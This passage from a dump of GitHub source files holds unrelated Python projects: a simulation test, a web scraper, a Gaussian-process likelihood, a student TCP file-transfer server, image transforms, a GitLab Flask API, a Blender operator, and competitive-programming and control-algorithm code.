model.modules[\"obs_source1\"]\n obs2 = model.modules[\"obs_source2\"]\n rp_obs1 = obs1.create_report_socket()\n rp_obs2 = obs2.create_report_socket()\n obs_assy = model.modules[\"obs_assy\"]\n rp_obs_assy = obs_assy.create_report_socket()\n while True:\n ##attente de l'arrivée d'un pièce\n logger.info(\"attente d'une piece\")\n yield emulation.get, self, rp_obs1, 1\n logger.info(\"pce 1 prete\")\n ev = self.got[0]\n logger.info(\"chargement\")\n rq = emulation.Request(\"trans\",\"move\",params={'program':'load'})\n yield emulation.put, self, trans.request_socket, [rq]\n ##pièces prêtes\n yield emulation.get, self, rp_obs2, 1\n logger.info(\"pce 2 prete\")\n yield emulation.get, self, rp_obs_assy, 1\n logger.info(\"pce assy chargée\")\n #print self.got[0]\n #yield emulation.put, self, assy.request_socket, [emulation.Request(\"assy\",\"setup\", params={\"program\":'p'})]\n ##début process\n logger.info(\"process\")\n yield emulation.put, self, assy.request_socket, [emulation.Request(\"assy\",\"assy\", params={\"program\":'p'})]\n ##attente fin process\n fin = False\n while not fin:\n yield emulation.get, self, rp_assy, 1\n logger.info(self.got[0])\n fin = self.got[0].what==\"idle\"\n ##déchargement\n logger.info(\"dechargement\")\n yield emulation.put, self, trans.request_socket, [emulation.Request(\"trans\", \"move\", params={\"program\": 'unload'})]\n\ndef get_model():\n model = emulation.Model()\n source1 = emulation.Holder(model, \"source1\")\n obs_source1 = emulation.PushObserver(model, \"obs_source1\", holder = source1)\n source2 = emulation.Holder(model, \"source2\")\n obs_source2 = emulation.PushObserver(model, \"obs_source2\", holder = source2)\n create1 = emulation.CreateAct(model, \"create1\", destination = source1)\n create2 = emulation.CreateAct(model, \"create2\", destination = source2)\n assy_space = emulation.Holder(model, \"assy_space\")\n obs_assy = emulation.PushObserver(model, \"obs_assy\", holder = assy_space)\n assy = emulation.AssembleAct(model, \"assy\", assy_holder = assy_space)\n trans = emulation.SpaceAct(model, \"trans\")\n sink = emulation.Holder(model, \"sink\")\n obs_sink = emulation.PushObserver(model, \"obs_sink\", holder = sink)\n trans.add_program('load', 2, {'source':source1, 'destination':assy_space})\n trans.add_program('unload', 1, {'source':assy_space, 'destination':sink})\n assy.add_program('p', 5, {'source':source2})\n model.register_control(ControlCreate)\n model.register_control(ControlAssy)\n return model\n\n\nclass TestSim10(unittest.TestCase):\n \n def test_ModelCreate(self):\n get_model()\n\n def test_Start(self):\n model = get_model()\n model.emulate(until = EMULATE_UNTIL)\n\n def test_RunResults(self):\n model = get_model()\n model.emulate(until = EMULATE_UNTIL)\n result_product = [(pid, \n p.shape_history, \n p.space_history, \n p.create_time, \n p.dispose_time) for (pid, p) in model.products.items()]\n result_resource = [model.modules[\"trans\"].trace, model.modules[\"assy\"].trace]\n self.assertEqual(result_product, EXP_RESULT_PRODUCT)\n self.assertEqual(result_resource, EXP_RESULT_RESOURCE)\n\n\nif __name__ == '__main__': \n unittest.main()\n","repo_name":"remipannequin/emulica","sub_path":"tests/test_sim10.py","file_name":"test_sim10.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33826897491","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom dsp.items import DspItem\nimport copy\n\n\nclass DsprolightSpider(scrapy.Spider):\n 
name = 'dsprolight'\n allowed_domains = ['www.dsprolight.com']\n start_urls = ['http://www.dsprolight.com/new-products.php']\n\n def parse(self, response):\n categorys = response.xpath('//*[@id=\"categories_block_left\"]/ul/li/a')\n\n for cate in categorys:\n item = DspItem()\n item['cateUrl'] = cate.xpath('./@href').extract()[0]\n item['cateLongName'] = cate.xpath('./@title').extract()[0]\n item['cateName'] = cate.xpath('./text()').extract()[0]\n yield scrapy.Request(\"%s?n=100\"%(item['cateUrl']),callback=self.parseProductList,meta={'item':item})\n\n\n def parseProductList(self,response):\n '''\n :type response: scrapy.http.response\n :param response:\n :return:\n '''\n productList = response.xpath(\"//div[@class='products clearfix']/ul/li\")\n for product in productList:\n item = response.meta[\"item\"]\n item['productUrl'] = product.xpath(\"./a/@href\").extract()[0]\n item['productName'] = product.xpath(\"./a/@title\").extract()[0]\n item['productImg'] = product.xpath(\"./a/img/@src\").extract()[0]\n yield scrapy.Request(\"%s\" % (item['productUrl']), callback=self.parseProductInfo, meta={'item': copy.deepcopy(item)})\n\n def parseProductInfo(self,response):\n '''\n :type response: scrapy.http.response\n :param response:\n :return:\n '''\n item = response.meta[\"item\"]\n item['productImgList'] = response.xpath(\"//ul[@id='thumbs_list_frame']/li/a/@href\").extract()\n item['productImg'] = response.xpath(\"//img[@id='bigpic']/@src\").extract()[0]\n item['productInfo'] = response.xpath(\"//div[@class='more_info_block clearfix']\")[0].extract()\n yield item\n\n\n\n","repo_name":"hezhenke/scrapy-dsprolight","sub_path":"dsp/spiders/dsprolight.py","file_name":"dsprolight.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"2483345599","text":"from . import Likelihood\nimport tensorflow as tf\nimport numpy as np\nimport math\nfrom .. import util\nfrom .. import debugger\nfrom .. 
sparsity import StandardSparsity\n\nclass SingleGPLikelihood(Likelihood):\n def __init__(self, context, r):\n self.context = context\n self.r = r\n\n def setup_standard(self):\n self.num_train = self.data.get_num_training(source=self.r)\n self.batch_size = self.data.get_batch_size(source=self.r)\n self.num_latent = self.context.num_latent\n self.num_outputs = self.context.num_outputs\n self.num_weights = self.context.num_weights\n self.num_inducing = self.data.get_num_inducing(source=self.r)\n self.kern_f = self.context.kern_f\n self.use_diag_covar_flag = self.context.use_diag_covar_flag\n self.jitter=self.context.jitter\n\n self.x_train = self.data.get_placeholder(source=self.r, var='x')\n self.y_train = self.data.get_placeholder(source=self.r, var='y')\n self.y_train_nans = self.data.get_placeholder(source=self.r, var='y_nan')\n\n #=====Components for q(u,v) as an MoG\n self.q_num_components = self.context.num_components\n self.num_sigma = self.num_inducing*(self.num_inducing+1)/2\n \n self.parameters = self.context.parameters\n\n self.get_standard_variables()\n self.sparsity = StandardSparsity(self.data, self.context)\n\n def setup(self, data):\n self.data = data\n self.setup_standard()\n\n def get_standard_variables(self):\n self.q_means_u = self.parameters.get(name='q_means_u_0')\n self.q_covars_u = self.parameters.get(name='q_covars_u_0')\n\n self.q_weights = self.parameters.get(name='q_weights')\n\n self.sigma_y = self.parameters.get(name='noise_sigma_0')\n self.sigma_f = self.parameters.get(name='f_sigma')\n\n self.inducing_locations = self.parameters.get(name='inducing_locations_0')\n\n\n def build_graph(self):\n lik = self._build_log_likelihood()\n return lik\n\n def _build_log_likelihood(self):\n total_sum = 0.0\n\n c1 = 0\n P = self.num_outputs\n\n get_sigma = lambda sig : tf.square(util.var_postive(sig))\n\n p = 0\n for k in range(self.q_num_components):\n pi_k = self.q_weights[k]\n n_p = tf.count_nonzero(self.y_train_nans[:,p])\n c1 -= pi_k * (tf.to_float(n_p)/2)*util.safe_log(2*np.pi*get_sigma(self.sigma_y[p]))\n total_sum = tf.Print(total_sum, [get_sigma(self.sigma_y[p])], 'sig^2')\n\n for k in range(self.q_num_components):\n pi_k = self.q_weights[k]\n _mu_f, _sigma_f, _, _ = self.sparsity._build_intermediate_conditionals(k, self.r, self.x_train)\n\n c2 = -(1/(2*get_sigma(self.sigma_y[p])))\n #c2 = tf.clip_by_value(c2, -1e20, 1e20)\n\n nan_mask = tf.cast(self.y_train_nans[:,p], dtype=tf.bool)\n y_p = tf.boolean_mask(mask=nan_mask, tensor=self.y_train[:,p])\n\n #sample the X where we have data\n sample_diag = lambda t: tf.boolean_mask(mask=nan_mask, tensor=t, axis=1)\n #sample_diag = lambda t: t\n\n mu_f = sample_diag(_mu_f[:, :, 0])\n\n f = mu_f\n\n err = y_p - tf.squeeze(f)\n err = tf.reduce_sum(tf.square(err), axis=0)\n\n total_sum += c2*pi_k*err\n\n return c1+total_sum\n","repo_name":"ohamelijnck/multi_res_gps","sub_path":"src/_gprn/likelihoods/single_gp_likelihood.py","file_name":"single_gp_likelihood.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"} +{"seq_id":"70885430977","text":"class Stack():\n \"\"\"Implementation of stack data structure\"\"\"\n\n def __init__(self):\n \"\"\"Initiate stack list and length\"\"\"\n self.stack = []\n self.length = 0\n\n def pop(self):\n \"\"\"pop the last element in the stack\"\"\"\n if self.length == 0:\n return \"stack is empty\"\n\n self.length -= 1\n return self.stack.pop()\n\n def push(self, data):\n\n self.stack.append(data)\n 
self.length += 1\n\n def peek(self):\n if self.length == 0:\n return \"stack is empty\"\n return self.stack[self.length - 1]\n\n\nstack = Stack()\nassert stack.pop() == \"stack is empty\"\nstack.push(3)\nstack.push(4)\nstack.push(5)\nstack.pop()\nstack.peek()\n\n","repo_name":"akinpelu746/Data-Structure-and-Algorithm-in-python","sub_path":"src/DataStructure/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24570082781","text":"import socket as sc\r\nfrom sys import argv\r\nimport os\r\nimport re\r\n\r\n\r\n# ALL RESOURCES (For the entire assignment)\r\n# https://docs.python.org/3.7/library/socket.html\r\n# https://stackoverflow.com/questions/15909064/python-implementation-for-stop-and-wait-algorithm\r\n# https://github.com/mj2266/stop-and-wait-protocol\r\n# https://pymotw.com/3/socket/udp.html\r\n# https://www.youtube.com/watch?v=3QiPPX-KeSc&t=2195s&ab_channel=TechWithTim\r\n# https://dev.to/black_strok3/difference-between-udp-and-tcp-example-code-1pg1\r\n# https://wiki.python.org/moin/UdpCommunication\r\n# https://github.com/DNofulla/Battleship-Game/blob/master/Battleship4.c (My own implementation in C for my ICSI 333 class game assignment)\r\n# https://stackoverflow.com/questions/6380057/python-binding-socket-address-already-in-use\r\n# https://github.com/nikhilroxtomar/Large-File-Transfer-using-TCP-Socket-in-Python3\r\n\r\n\r\n\"\"\"server_tcp.py: TCP Implementation of a server socket\"\"\"\r\n\r\n__author__ = \"Daniel Nofulla\"\r\n__version__ = \"1.0.0\"\r\n__email__ = \"dnofulla@albany.edu\"\r\n\r\n\r\n\"\"\"Main Function\r\n\r\nThis function runs the python program!\r\n\"\"\"\r\n\r\n\r\ndef main():\r\n\r\n if len(argv) != 2:\r\n print(\r\n \"Number of command line arguments MUST be 2. The python file name and the port\")\r\n print(\"Example:\")\r\n print(\"python3 server_tcp.py \")\r\n exit(1)\r\n\r\n \"\"\"Server starts and listens for clients\r\n\r\n To run this TCP Server, make sure to use python3 and\r\n run it like this:\r\n\r\n python3 server_tcp.py \r\n \"\"\"\r\n\r\n server = None\r\n address = None\r\n\r\n flag = True\r\n while flag:\r\n\r\n \"\"\"Setting up socket\r\n\r\n If the server or address variable are equal to None, that means\r\n that the client had either disconnected or that the server had \r\n just started. If that condition is met, then a new server TCP\r\n socket will be initialized and will listen and wait to accept \r\n clients.\r\n \"\"\"\r\n\r\n if server == None or address == None:\r\n print(\"Server is starting...\")\r\n server = sc.socket(sc.AF_INET, sc.SOCK_STREAM)\r\n server.setsockopt(sc.SOL_SOCKET, sc.SO_REUSEADDR, 1)\r\n server.bind(('', int(argv[1])))\r\n server.listen()\r\n print(\"Server is listening...\")\r\n server, address = server.accept()\r\n print(f\"Client {address} connected!\")\r\n\r\n \"\"\"Server Receives input from the Client\r\n\r\n The server receives the client input from the client.\r\n The server receives up to 1024 bytes of input. 
The server\r\n        then converts that client input to an argument array, for easy\r\n        access to each argument in the client input.\r\n        \"\"\"\r\n        client_input = server.recv(1024).decode(\"utf-8\")\r\n        print(f\"Client entered command: {client_input}\")\r\n        arguments = client_input.split()\r\n        server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n        if len(arguments) > 3 or len(arguments) < 1:\r\n            arguments[0] = \"Invalid number of arguments\"\r\n\r\n        if arguments[0].upper() == 'PUT':\r\n\r\n            \"\"\"PUT COMMAND\r\n\r\n            This Command is used like this:\r\n\r\n            PUT <file name>\r\n\r\n            When the put command is received, the server sends\r\n            a response to the client that it received the file name\r\n            and size (from the command arguments). Then the server proceeds\r\n            to receive the file data with a buffer of that size. After the server receives the data, it\r\n            writes the data to the file, successfully completing the upload.\r\n            The server then lets the client know that the file was uploaded.\r\n            \"\"\"\r\n\r\n            if len(arguments) != 2:\r\n                print(\"Incorrect number of arguments\")\r\n                print(\"How to execute a PUT command:\")\r\n                print(\"PUT <file name>\")\r\n            else:\r\n                print(f\"Client uploading file {arguments[1]}...\")\r\n                file = open(arguments[1], \"w+\")\r\n                size = int(server.recv(1024).decode(\"utf-8\"))\r\n                print(f\"Receiving the file data...\")\r\n                server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n                while size:\r\n                    data = server.recv(1000)\r\n                    data = data.decode(\"utf-8\")\r\n                    file.write(data)\r\n                    server.send(\"Confirm\".encode(\"utf-8\"))\r\n\r\n                    if len(data) < 1000 and size % 1000 != 0:\r\n                        break\r\n\r\n                server.recv(1024).decode(\"utf-8\")\r\n\r\n                file.close()\r\n                print(f\"Received and Wrote file data for {arguments[1]}\")\r\n                server.send(\"File uploaded.\".encode(\"utf-8\"))\r\n\r\n        elif arguments[0].upper() == \"GET\":\r\n\r\n            \"\"\"GET COMMAND\r\n\r\n            This Command is used like this:\r\n\r\n            GET <file name>\r\n\r\n            The server first opens the file being requested, then\r\n            sends the size of the file to the client, and then proceeds\r\n            to read the data and send it to the client. 
After that\r\n            it sends a message to the client that says that the file\r\n            has been downloaded.\r\n            \"\"\"\r\n\r\n            if len(arguments) != 2:\r\n                print(\"Incorrect number of arguments\")\r\n                print(\"How to execute a GET command:\")\r\n                print(\"GET <file name>\")\r\n            else:\r\n                print(f\"Client downloading file {arguments[1]}...\")\r\n                file = open(arguments[1], \"r\")\r\n                server.recv(1024).decode(\"utf-8\")\r\n                print(\"Sending file size to the client...\")\r\n                server.send(str(os.path.getsize(arguments[1])).encode(\"utf-8\"))\r\n                print(f\"Sent file data for {arguments[1]}\")\r\n                server.recv(1024).decode(\"utf-8\")\r\n                data = file.read()\r\n                print(\"Sending file data to the client...\")\r\n                server.send(data.encode(\"utf-8\"))\r\n                server.recv(1024).decode(\"utf-8\")\r\n                print(\"Sent file data to the client!\")\r\n\r\n                file.close()\r\n\r\n                server.send((\"File %s downloaded.\" %\r\n                             arguments[1]).encode(\"utf-8\"))\r\n                server.recv(1024).decode(\"utf-8\")\r\n\r\n        elif arguments[0].upper() == \"KEYWORD\":\r\n\r\n            \"\"\"KEYWORD COMMAND\r\n\r\n            This Command is used like this:\r\n\r\n            KEYWORD <keyword_to_be_anonymized> <file name>\r\n\r\n            The server opens the file to be anonymized and creates a name with\r\n            the same name but with a '_anon.txt' ending instead of just '.txt'.\r\n            In the anonymization output file, we copy the data from the original\r\n            file to the anonymization output file, but we replace any occurrence of\r\n            the keyword_to_be_anonymized in the file with 'X's.\r\n            For example, the word 'Project' would turn into 'XXXXXXX'.\r\n            \"\"\"\r\n\r\n            if len(arguments) != 3:\r\n                print(\"Incorrect number of arguments\")\r\n                print(\"How to execute a KEYWORD command:\")\r\n                print(\"KEYWORD <keyword_to_be_anonymized> <file name>\")\r\n            else:\r\n                print(\r\n                    f\"Client anonymizing file {arguments[2]} with keyword {arguments[1]}...\")\r\n\r\n                old_name = arguments[2]\r\n                print(\"Opening files...\")\r\n                file = open(arguments[2], \"r\")\r\n                new_name = arguments[2].replace(\".txt\", \"_anon.txt\")\r\n                new_file = open(new_name, \"w+\")\r\n                print(\"Anonymizing and Writing file...\")\r\n\r\n                new_file.write(re.compile(re.escape(arguments[1]), re.IGNORECASE).sub(\r\n                    \"X\" * len(arguments[1]), file.read()))\r\n\r\n                file.close()\r\n                new_file.close()\r\n                server.recv(1024).decode(\"utf-8\")\r\n                print(\r\n                    f\"File {old_name} anonymized. Output file is {new_name}!\")\r\n                server.send((\"File %s anonymized. 
Output file is %s\" %\r\n (old_name, new_name)).encode(\"utf-8\"))\r\n\r\n elif arguments[0].upper() == \"QUIT\":\r\n\r\n \"\"\"QUIT COMMAND\r\n\r\n This Command is used like this:\r\n\r\n QUIT \r\n\r\n The server simply prints out that the client has disconnected.\r\n \"\"\"\r\n\r\n if len(arguments) != 1:\r\n print(\"Incorrect number of arguments\")\r\n print(\"How to execute a QUIT command:\")\r\n print(\"QUIT\")\r\n else:\r\n print(f\"Client {address} disconnected from the server!\")\r\n address = None\r\n server.close()\r\n server = None\r\n\r\n else:\r\n\r\n \"\"\"Failed Commands\r\n\r\n Failed commands are commands that are not listed above.\r\n These commands will be ignored by the server and just simply\r\n go to the next request iteration in the loop.\r\n \"\"\"\r\n\r\n print(f\"{arguments[0]}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"DNofulla/icsi_416_project_1","sub_path":"server/server_tcp.py","file_name":"server_tcp.py","file_ext":"py","file_size_in_byte":9134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1995169687","text":"import cv2\nimport numpy as np\nimport time\n\n# Load the input image.\nimg = cv2.imread('HW1_Q3.png')\n\n# Define a scaling factor and number of frames.\nscale_factor = 0.5\nnum_frames = 10\n\n# Get the width and height of the frame and resize the image to match with it.\nheight, width, _ = img.shape\nnew_width = int(width * scale_factor)\nnew_height = int(height * scale_factor)\nimg = cv2.resize(img, (new_width, new_height))\n\n# Define the transformation matrices for translations, scales, rotations, and shears.\ntranslation_matrix = np.float32([[1, 0, -160], [0, 1, -160]])\nscale_matrix = np.float32([[0.5, 0, 0], [0, 0.5, 0]])\nrotation_matrix = cv2.getRotationMatrix2D((new_width / 2, new_height / 2), -50, 1)\nshear_matrix = np.float32([[1, 0.2, 0], [0, 1, 0]])\n\n# Define an array of matrices.\ntransformation_matrices = [translation_matrix, scale_matrix, rotation_matrix, shear_matrix]\n\n# Define an empty array to store the final output.\nout_frames = []\n\n# Loop through each frame and generate the images.\nfor i in range(num_frames):\n\n # Create a copy of the original image.\n img_copy = img.copy()\n\n # Loop through each transformation matrix and apply it to the copy of the original image.\n for matrix in transformation_matrices:\n img_copy = cv2.warpAffine(img_copy, matrix, (new_width, new_height))\n\n # Concatenate the original image with the transformed image and store it in the final array.\n out_frame = np.concatenate((img, cv2.flip(img_copy, 1)), axis=1)\n out_frames.append(out_frame)\n\n # Wait for a second before generating the next frame.\n time.sleep(1)\n\n# Combine the frames to create a video.\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nvideo = cv2.VideoWriter('output.mp4', fourcc, 10, (2 * new_width, new_height))\nfor frame in out_frames:\n video.write(frame)\n\n# Release the video writer and delete the temporary image files.\nvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"Pouya-Ta/Image-processing-Projects","sub_path":"week 1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42209763325","text":"# on raspberry\nimport socket\nfrom time import sleep\n\ncomputer_name = \"CYBERSPACE.local\"\nport = 1992\n\naddr = (computer_name,port)\n\ndef hibernate_server(inifinite):\n while True:\n try:\n s = 
socket.create_connection(addr,timeout=1)\n            s.send(b\"hibernate\")\n            return\n        except Exception as e:\n            print(e)\n            if not inifinite:\n                return\nif __name__ == \"__main__\":\n    hibernate_server(True)\n","repo_name":"cobrce/RaspberryPi-Shutdown","sub_path":"RaspberrypiClient_(python)/hibernate_server.py","file_name":"hibernate_server.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"24153442130","text":"import sys\nsys.path.append('..')\nfrom flask_restful import Resource\nfrom flask import jsonify, abort, request\nimport gitlab\nfrom gitlab.exceptions import GitlabAuthenticationError\nfrom auth import repo_url\n\n\n# Get a single project by ID\nclass Project(Resource):\n    \"\"\"\n    Project represents an API resource for projects on gitlab.\n    \"\"\"\n    def get(self, id):\n        \"\"\"\n        Get a project and its associated details from gitlab.\n        :param id: the id of the gitlab project to retrieve\n        :return: the project.\n        \"\"\"\n\n        if 'Private-Token' not in request.headers:\n            abort(401, 'User Unauthorized')\n\n        token = request.headers['Private-Token']\n\n        try:\n\n            with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n                project = gl.projects.get(id)\n\n        except GitlabAuthenticationError as error:\n            abort(401, 'User Unauthorized.')\n\n        return jsonify({\"project\": project.attributes})\n\n# Get all existing projects.\nclass AllProjects(Resource):\n    \"\"\"\n    AllProjects represents an API resource for all projects on gitlab.\n    \"\"\"\n    def get(self):\n        \"\"\"\n        Get all projects from gitlab the current user is allowed to view.\n        :return: the list of projects the user can see.\n        \"\"\"\n\n        if 'Private-Token' not in request.headers:\n            abort(401, 'User Unauthorized')\n\n        token = request.headers['Private-Token']\n\n        try:\n\n            with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n                # ProjectManager.get() requires a project id; list() returns the visible projects\n                projects = gl.projects.list(all=True)\n                projectList = [project.attributes for project in projects]\n\n        except GitlabAuthenticationError as error:\n            abort(401, 'User Unauthorized.')\n\n        return jsonify({\"Projects\": projectList})\n\n# Get a List of all projects by a user.\nclass Project_List(Resource):\n    \"\"\"\n    ProjectList represents an API resource for all projects associated\n    with the current user.\n    \"\"\"\n    def get(self):\n        \"\"\"\n        Get all projects from gitlab associated with the current user.\n        :return: a list of the current user's gitlab projects\n        \"\"\"\n\n        if 'Private-Token' not in request.headers:\n            abort(401, 'User Unauthorized')\n\n        token = request.headers['Private-Token']\n\n        try:\n\n            with gitlab.Gitlab(repo_url, ssl_verify=False, private_token=token) as gl:\n                \n                projects = gl.projects.list(owned=True)\n                projectList = [project.attributes for project in projects]\n\n        except GitlabAuthenticationError as error:\n            abort(401, 'User Unauthorized.')\n\n        return jsonify({\"Projects\": projectList})","repo_name":"awagsta/asset-management","sub_path":"resources/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":2728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26470019111","text":"#from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np \n \nclass SpectralSubSampler:\n    def __init__(self, numMSBands, listOfLambda, listOfCenterMin=None, listOfCenterMax=None, listOfFWHMMin=None, listOfFWHMMax=None):\n        self.numMSBands = numMSBands\n        self.numHSBands = len(listOfLambda)\n        self.listOfLambda = 
listOfLambda\n self.listOfCenterMin = listOfCenterMin\n self.listOfCenterMax = listOfCenterMax\n self.listOfFWHMMin = listOfFWHMMin\n self.listOfFWHMMax = listOfFWHMMax\n\n def __call__(self, x): \n initValueForSigmoid=4\n defaultMSMinFWHM = 5 * (np.max(self.listOfLambda)-np.min(self.listOfLambda))/len(self.listOfLambda)\n b = 3 #guard gap parameter \n\n lambdaSteps = tf.constant(np.array(self.listOfLambda, dtype=np.float32).reshape((self.numHSBands,1)))\n if self.listOfCenterMin is not None:\n centerMin = tf.constant(np.array(self.listOfCenterMin, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n centerMin = tf.constant(np.array([np.min(self.listOfLambda)]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfCenterMax is not None:\n centerMax = tf.constant(np.array(self.listOfCenterMax, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n centerMax = tf.constant(np.array([np.max(self.listOfLambda)]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfFWHMMin is not None:\n FWHMMin = tf.constant(np.array(self.listOfFWHMMin, dtype=np.float32).reshape((1,self.numMSBands)))\n else:\n FWHMMin = tf.constant(np.array([defaultMSMinFWHM]*self.numMSBands, dtype=np.float32).reshape((1,self.numMSBands)))\n if self.listOfFWHMMax is not None:\n FWHMMax = tf.constant(np.array(self.listOfFWHMMax, dtype=np.float32).reshape((1,self.numMSBands)))\n\n\n mu0 = tf.get_variable(\"mu0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=-initValueForSigmoid,maxval=initValueForSigmoid))\n \n if self.listOfFWHMMax is not None:\n sigma0 = tf.get_variable(\"sigma0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=-initValueForSigmoid,maxval=initValueForSigmoid))\n else:\n sigma0 = tf.get_variable(\"sigma0\", shape=[1,self.numMSBands],initializer=tf.random_uniform_initializer(minval=0,maxval=(np.max(self.listOfLambda)-np.min(self.listOfLambda))/6))\n\n if self.listOfFWHMMax is not None:\n sigma = FWHMMin/2.355+tf.nn.sigmoid(sigma0)*(FWHMMax/2.355-FWHMMin/2.355)\n else:\n sigma = FWHMMin/2.355+tf.abs(sigma0)\n \n mu = (centerMin+b*sigma)+tf.nn.sigmoid(mu0)*(centerMax-centerMin-2*b*sigma)\n \n z_2 = tf.div(tf.square(lambdaSteps-mu),2*tf.square(sigma)) \n Z = tf.sqrt(2*np.pi*tf.square(sigma))\n Kmulti = tf.exp(-z_2) / Z\n \n y = tf.matmul(x, Kmulti) \n\n self.mu0 = mu0\n self.sigma0 = sigma0\n self.mu = mu\n self.sigma = sigma\n return y\n \n def get_parameters(self):\n return [self.mu0, self.sigma0]\n \n def get_bands(self):\n return [self.mu, 2.355*self.sigma]\n\n","repo_name":"UBGewali/optimized-spectral-superresolution","sub_path":"code/SpectralSubSampler.py","file_name":"SpectralSubSampler.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"79"} +{"seq_id":"19886816987","text":"import bpy\nimport bmesh\nfrom logging import getLogger\n\nlogger = getLogger(__name__)\n\n\ndef get_selected_index(bm: bmesh.types.BMesh):\n selected = [v.index for v in bm.verts if v.select is True]\n return selected\n\n\n# 選択頂点に含まれる頂点グループを列挙する\ndef get_vertex_groups_from_selected(obj: bpy.types.Object):\n if isinstance(obj.data, bpy.types.Mesh):\n mesh = obj.data\n # オブジェクトに含まれる頂点グループを取得\n vertex_groups = obj.vertex_groups\n # 選択頂点を取得\n bm = bmesh.from_edit_mesh(obj.data)\n selected_indices = get_selected_index(bm)\n # 選択頂点に含まれる頂点グループインデックスを取得\n # リアルタイムの選択頂点はbmeshからじゃないとうまく行かないっぽいけどvertex groupとかのデータ自体へのアクセスはbpy.dataからのほうがやりやすい\n\n 
group_indices: list[int] = []\n verts = bm.verts\n bm.verts.layers.deform.verify()\n for i in selected_indices:\n pass\n group_set = set(group_indices)\n names = [vertex_groups[i].name for i in group_set]\n return names\n else:\n return None\n\n\nclass NWC_OT_WeightControl(bpy.types.Operator):\n \"\"\"a\"\"\"\n\n bl_idname = \"mesh.weight_control\"\n bl_label = \"\"\n bl_description = \"operator description\"\n bl_options = {\"REGISTER\", \"UNDO\"}\n\n # メニューを実行したときに呼ばれるメソッド\n def execute(self, context):\n # logging\n logger.debug(\"exec my ops\")\n result = get_vertex_groups_from_selected(context.object)\n # infoにメッセージを通知\n self.report({\"INFO\"}, f\"{result}\")\n # 正常終了ステータスを返す\n return {\"FINISHED\"}\n\n\nclasses = [NWC_OT_WeightControl]\ntools = []\n\n\ndef register():\n for c in classes:\n bpy.utils.register_class(c)\n for t in tools:\n bpy.utils.register_tool(t)\n\n\ndef unregister():\n for c in classes:\n bpy.utils.unregister_class(c)\n for t in tools:\n bpy.utils.unregister_tool(t)\n","repo_name":"nepia11/weight_control","sub_path":"lib/ops_weight_control.py","file_name":"ops_weight_control.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18570933643","text":"from heapq import heappop, heappush\n\n\ndef solve(n, m, k, uva_list, s_list):\n dist = [10 * n] * (2 * n + 1)\n g = [[] for _ in range(2 * n + 1)]\n for u, v, a in uva_list:\n if a == 1:\n g[u].append(v)\n g[v].append(u)\n else:\n g[u + n].append(v + n)\n g[v + n].append(u + n)\n for s in s_list:\n g[s].append(s + n)\n g[s + n].append(s)\n\n h = []\n dist[1] = 0\n heappush(h, (0, 1))\n\n while len(h) > 0:\n d, p = heappop(h)\n for q in g[p]:\n if abs(p - q) == n:\n if dist[q] > d:\n dist[q] = d\n heappush(h, (d, q))\n else:\n if dist[q] > d + 1:\n dist[q] = d + 1\n heappush(h, (d + 1, q))\n res = min(dist[n], dist[2 * n])\n if res == 10 * n:\n res = -1\n return res\n\n\ndef main():\n n, m, k = map(int, input().split())\n uva_list = [tuple(map(int, input().split())) for _ in range(m)]\n s_list = list(map(int, input().split()))\n res = solve(n, m, k, uva_list, s_list)\n print(res)\n\n\ndef test():\n assert solve(5, 5, 2, [(1, 3, 0), (2, 3, 1), (5, 4, 1), (2, 1, 1), (1, 4, 0)], [3, 4]) == 5\n assert solve(4, 4, 2, [(4, 3, 0), (1, 2, 1), (1, 2, 0), (2, 2, 1)], [2, 4]) == -1\n\n\nif __name__ == \"__main__\":\n test()\n main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC251-300/ABC277/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"2592642895","text":"\"\"\"\n/******************************************************************************\nLicense: GNU General Public License v2.0\nFile name: stanley.py\nAuthor: LiXianQiang Date:2021/05/11 Version: 0.0.1\nDescription: Stanley车辆横向控制算法实现\nClass List:\n Class Stanley\n __init__(self, k_gain, bodyLen, max_steerAngle): 控制器初始化\n CalculateFrontWheelPoseWith(self, rearWheelPose):\n controller(self, refPose, currPose, currVel, reverse): 